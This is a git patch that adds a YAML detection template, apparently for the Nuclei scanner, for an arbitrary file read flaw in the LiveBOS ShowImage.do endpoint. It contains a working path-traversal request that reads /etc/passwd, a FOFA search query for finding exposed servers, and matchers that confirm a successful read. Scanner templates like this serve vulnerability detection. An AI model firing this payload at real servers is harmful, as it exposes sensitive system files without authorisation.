From 557ea8710f2c08ebf894bebc74bb462c3910e536 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 24 Oct 2023 16:00:01 +0530 Subject: [PATCH] Add files via upload --- .../other/livebos-file-read.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/vulnerabilities/other/livebos-file-read.yaml diff --git a/http/vulnerabilities/other/livebos-file-read.yaml b/http/vulnerabilities/other/livebos-file-read.yaml new file mode 100644 index 0000000000..8661b77809 --- /dev/null +++ b/http/vulnerabilities/other/livebos-file-read.yaml @@ -0,0 +1,32 @@ +id: livebos-file-read + +info: + name: LiveBOS ShowImage.do - Arbitrary File Read + author: yusakie + severity: high + description: | + An arbitrary file read vulnerability exists in the LiveBOS ShowImage.do interface, which can be exploited to obtain sensitive files from the server. + reference: + - https://www.wevul.com/2301.html + metadata: + verified: "true" + fofa-query: 'app="LiveBOS-框架" && body="管理控制台"' + tags: livebos,lfi + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + GET /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - contains(body_1, "Power by LiveBOS") + - regex('root:.*:0', body_2) + - status_code_2 == 200 + condition: and \ No newline at end of file